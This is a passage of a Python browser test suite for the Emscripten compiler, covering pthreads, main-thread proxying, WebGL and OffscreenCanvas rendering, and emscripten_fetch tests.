# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(test_file('pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'INITIAL_MEMORY=128MB'])
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS']]:
self.btest(test_file('gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest(test_file('pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest(test_file('pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async(self):
self.btest(test_file('pthread', 'call_async.c'), expected='1', args=['-s', 'USE_PTHREADS'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest(test_file('pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread', 'call_sync_on_main_thread.js')])
self.btest(test_file('pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_sync_on_main_thread.js')])
self.btest(test_file('pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_sync_on_main_thread.js'), '-s', 'EXPORTED_FUNCTIONS=_main,_malloc'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(test_file('pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread', 'call_async_on_main_thread.js')])
self.btest(test_file('pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_async_on_main_thread.js')])
self.btest(test_file('pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
for args in [['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')], ['-O3']]:
self.btest(test_file('pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
args = ['-s', 'WASM_ASYNC_COMPILATION=0']
self.btest(test_file('pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest(test_file('pthread', 'test_pthread_clock_drift.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest(test_file('pthread', 'test_pthread_utf8_funcs.cpp'), expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test the emscripten_futex_wake(addr, INT_MAX) functionality to wake all waiters.
@requires_threads
def test_pthread_wake_all(self):
self.btest(test_file('pthread', 'test_futex_wake_all.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'INITIAL_MEMORY=64MB', '-s', 'NO_EXIT_RUNTIME'], also_asmjs=True)
# Test that stack base and max correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
self.btest(test_file('pthread', 'test_pthread_stack_bounds.cpp'), expected='1', args=['-s', 'USE_PTHREADS'])
# Test that real `thread_local` works.
@requires_threads
def test_pthread_tls(self):
self.btest(test_file('pthread', 'test_pthread_tls.cpp'), expected='1337', args=['-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@requires_threads
def test_pthread_tls_main(self):
self.btest(test_file('pthread', 'test_pthread_tls_main.cpp'), expected='1337', args=['-s', 'USE_PTHREADS'])
@requires_threads
def test_pthread_safe_stack(self):
# Note that as the test runs with PROXY_TO_PTHREAD, we set TOTAL_STACK,
# and not DEFAULT_PTHREAD_STACK_SIZE, as the pthread for main() gets the
# same stack size as the main thread normally would.
self.btest(test_file('core', 'test_safe_stack.c'), expected='abort:stack overflow', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'STACK_OVERFLOW_CHECK=2', '-s', 'TOTAL_STACK=64KB'])
@parameterized({
'leak': ['test_pthread_lsan_leak', ['-gsource-map']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_lsan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
@parameterized({
# Reusing the LSan test files for ASan.
'leak': ['test_pthread_lsan_leak', ['-gsource-map']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_asan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
@requires_threads
def test_pthread_asan_use_after_free(self):
self.btest(test_file('pthread', 'test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', test_file('pthread', 'test_pthread_asan_use_after_free.js')])
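# The next two tests build test_pthread_exit_runtime.c with and without -s EXIT_RUNTIME; the
# shared pre.js registers an onExit handler, so the first run expects the 'onExit status: 42'
# report while the second expects onExit never to fire.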
@requires_threads
def test_pthread_exit_process(self):
args = ['-s', 'USE_PTHREADS',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-s', 'EXIT_RUNTIME',
'-DEXIT_RUNTIME',
'-O0']
args += ['--pre-js', test_file('core', 'pthread', 'test_pthread_exit_runtime.pre.js')]
self.btest(test_file('core', 'pthread', 'test_pthread_exit_runtime.c'), expected='onExit status: 42', args=args)
@requires_threads
def test_pthread_no_exit_process(self):
# Same as above but without EXIT_RUNTIME. In this case we don't expect onExit to
# ever be called.
args = ['-s', 'USE_PTHREADS',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-O0']
args += ['--pre-js', test_file('core', 'pthread', 'test_pthread_exit_runtime.pre.js')]
self.btest(test_file('core', 'pthread', 'test_pthread_exit_runtime.c'), expected='43', args=args)
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
def test_main_thread_em_asm_signatures(self):
self.btest_exit(test_file('core', 'test_em_asm_signatures.cpp'), assert_returncode=121, args=[])
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest_exit(test_file('core', 'test_em_asm_signatures.cpp'), assert_returncode=121, args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'ASSERTIONS'])
@requires_threads
def test_main_thread_async_em_asm(self):
self.btest_exit(test_file('core', 'test_main_thread_async_em_asm.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'ASSERTIONS'])
@requires_threads
def test_main_thread_em_asm_blocking(self):
create_file('page.html', open(test_file('browser', 'test_em_asm_blocking.html')).read())
self.compile_btest([test_file('browser', 'test_em_asm_blocking.cpp'), '-O2', '-o', 'wasm.js', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
self.run_browser('page.html', '', '/report_result?8')
# Test that it is possible to send a signal by calling alarm(timeout), which in turn invokes the signal handler set by signal(SIGALRM, func).
def test_sigalrm(self):
self.btest(test_file('sigalrm.cpp'), expected='0', args=['-O3'])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', test_file('canvas_style_proxy_shell.html'), '--pre-js', test_file('canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(test_file('canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(test_file('custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', test_file('custom_messages_proxy_shell.html'), '--post-js', test_file('custom_messages_proxy_postjs.js')])
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
self.compile_btest([test_file('in_flight_memfile_request.c'), '-o', 'test.js'] + opts)
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
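# test_binaryen_async wraps WebAssembly.instantiate/instantiateStreaming in the shell so the
# program can record whether compilation went through the async path; an exit code of 1 below
# means async compilation was observed, 0 means it was forced off via WASM_ASYNC_COMPILATION=0.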
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, returncode in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'WASM_ASYNC_COMPILATION'], 1), # force it on
(['-O1', '-s', 'WASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, returncode)
self.btest_exit('binaryen_async.c', assert_returncode=returncode, args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest_exit('binaryen_async.c', assert_returncode=1, args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
@parameterized({
'': ([],),
'asan': (['-fsanitize=address', '-s', 'INITIAL_MEMORY=128MB'],)
})
def test_manual_wasm_instantiate(self, args=[]):
self.compile_btest([test_file('manual_wasm_instantiate.cpp'), '-o', 'manual_wasm_instantiate.js'] + args)
shutil.copyfile(test_file('manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
ensure_dir('cdn')
create_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
self.compile_btest([test_file('browser_test_hello_world.c'), '--shell-file', 'shell2.html', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest_exit('benchmark_utf8.cpp', 0, args=['--embed-file', test_file('utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXPORTED_RUNTIME_METHODS=[UTF8ToString]'])
def test_utf16_textdecoder(self):
self.btest_exit('benchmark_utf16.cpp', 0, args=['--embed-file', test_file('utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXPORTED_RUNTIME_METHODS=[UTF16ToString,stringToUTF16,lengthBytesUTF16]'])
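# test_TextDecoder compares generated JS sizes across the three UTF-8 decoding modes:
# TEXTDECODER=0 ships only the JS fallback decoder, the default build here ships TextDecoder
# plus the fallback, and TEXTDECODER=2 ships TextDecoder alone, which should be the smallest.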
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
self.assertLess(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
def test_small_js_flags(self):
self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure=1', '-s', 'INCOMING_MODULE_JS_API=[]', '-s', 'ENVIRONMENT=web'])
# Check an absolute js code size, with some slack.
size = os.path.getsize('test.js')
print('size:', size)
# Note that this size includes test harness additions (for reporting the result, etc.).
self.assertLess(abs(size - 5453), 100)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has first been used to render WebGL content in a pthread
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
@disabled('This test is disabled because current OffscreenCanvas does not allow transfering it after a rendering context has been created for it.')
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest('gl_only_in_pthread.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-s', 'FULL_ES2=1'])
# Tests for WEBGL_multi_draw extension
# For testing WebGL draft extensions like this, if using Chrome as the browser,
# you may need to append --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
@requires_graphics_hardware
def test_webgl_multi_draw(self):
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
# Tests for base_vertex/base_instance extension
# For testing WebGL draft extensions like this, if using Chrome as the browser,
# you may need to append --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
# If testing on Mac, you also need --use-cmd-decoder=passthrough to get this extension.
# There is also a known bug with Mac Intel baseInstance that can fail to produce the expected image result.
@requires_graphics_hardware
def test_webgl_draw_base_vertex_base_instance(self):
for multiDraw in [0, 1]:
for drawElements in [0, 1]:
self.btest('webgl_draw_base_vertex_base_instance_test.c', reference='webgl_draw_instanced_base_vertex_base_instance.png',
args=['-lGL',
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'OFFSCREEN_FRAMEBUFFER',
'-DMULTI_DRAW=' + str(multiDraw),
'-DDRAW_ELEMENTS=' + str(drawElements),
'-DEXPLICIT_SWAP=1',
'-DWEBGL_CONTEXT_VERSION=2'])
@requires_graphics_hardware
def test_webgl_sample_query(self):
cmd = ['-s', 'MAX_WEBGL_VERSION=2', '-lGL']
self.btest('webgl_sample_query.cpp', expected='0', args=cmd)
@requires_graphics_hardware
def test_webgl_timer_query(self):
for args in [
# EXT query entrypoints on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION'],
# builtin query entrypoints on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2'],
# EXT query entrypoints on a WebGL 1.0 context while built for WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2'],
]:
cmd = args + ['-lGL']
self.btest('webgl_timer_query.cpp', expected='0', args=cmd)
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
# Tests all the different possible versions of libgl
for threads in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
for version in [[], ['-s', 'FULL_ES3']]:
args = ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1'] + threads + version
print('with args: %s' % str(args))
self.btest('webgl_draw_triangle.c', '0', args=args)
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
self.btest('test_webgl_no_auto_init_extensions.c', '0', args=['-lGL', '-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# VAO path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION'],
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1']
self.btest('webgl_offscreen_framebuffer_swap_with_bad_state.c', '0', args=cmd)
# Tests that -s WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1 rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest('webgl_draw_triangle_with_uniform_color.c', '0', args=['-lGL', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_proxied_pthread(self):
for asyncify in [0, 1]:
cmd = ['-s', 'USE_PTHREADS', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'GL_DEBUG', '-s', 'PROXY_TO_PTHREAD']
if asyncify:
# given the synchronous render loop here, asyncify is needed to see intermediate frames and
# the gradual color change
cmd += ['-s', 'ASYNCIFY', '-DASYNCIFY']
print(str(cmd))
self.btest('gl_in_proxy_pthread.cpp', expected='1', args=cmd)
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self):
for args1 in [[], ['-s', 'PROXY_TO_PTHREAD']]:
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
cmd = args1 + args2 + args3 + ['-s', 'USE_PTHREADS', '-lGL', '-s', 'GL_DEBUG']
print(str(cmd))
self.btest('resize_offscreencanvas_from_main_thread.cpp', expected='1', args=cmd)
@requires_graphics_hardware
def test_webgl_simple_enable_extensions(self):
for webgl_version in [1, 2]:
for simple_enable_extensions in [0, 1]:
cmd = ['-DWEBGL_CONTEXT_VERSION=' + str(webgl_version),
'-DWEBGL_SIMPLE_ENABLE_EXTENSION=' + str(simple_enable_extensions),
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=' + str(simple_enable_extensions),
'-s', 'GL_SUPPORT_SIMPLE_ENABLE_EXTENSIONS=' + str(simple_enable_extensions)]
self.btest('webgl2_simple_enable_extensions.c', expected='0', args=cmd)
  # Tests the feature that a shell html page can preallocate the typed array and place it
  # in Module.buffer before loading the script page.
  # In this build mode, the -s INITIAL_MEMORY=xxx option will be ignored.
  # Preallocating the buffer in this way is asm.js only (wasm needs a Memory).
def test_preallocated_heap(self):
self.btest_exit('test_preallocated_heap.cpp', args=['-s', 'WASM=0', '-s', 'INITIAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', test_file('test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(test_file('gears.png'), 'gears.png')
for arg in [[], ['-s', 'FETCH_SUPPORT_INDEXEDDB=0']]:
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'] + arg,
also_asmjs=True)
@parameterized({
'': ([],),
'pthread_exit': (['-DDO_PTHREAD_EXIT'],),
})
@requires_threads
def test_fetch_from_thread(self, args):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/from_thread.cpp',
expected='42',
args=args + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'FETCH_DEBUG', '-s', 'FETCH', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
def test_fetch_to_indexdb(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/to_indexeddb.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'],
also_asmjs=True)
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/cached_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'],
also_asmjs=True)
# Tests that response headers get set on emscripten_fetch_t values.
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/response_headers.cpp', expected='1', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'], also_asmjs=True)
  # Tests emscripten_fetch() usage to stream an XHR into memory without storing the full file in memory
def test_fetch_stream_file(self):
self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest('fetch/stream_file.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'INITIAL_MEMORY=536870912'],
also_asmjs=True)
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_fetch_sync_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp', expected='1', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests emscripten_fetch() usage when user passes none of the main 3 flags (append/replace/no_download).
  # In that case, append is implicitly assumed.
@requires_threads
def test_fetch_implicit_append(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@requires_threads
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '--proxy-to-worker'],
also_asmjs=True)
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@no_wasm_backend("emscripten_fetch_wait uses an asm.js based web worker")
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
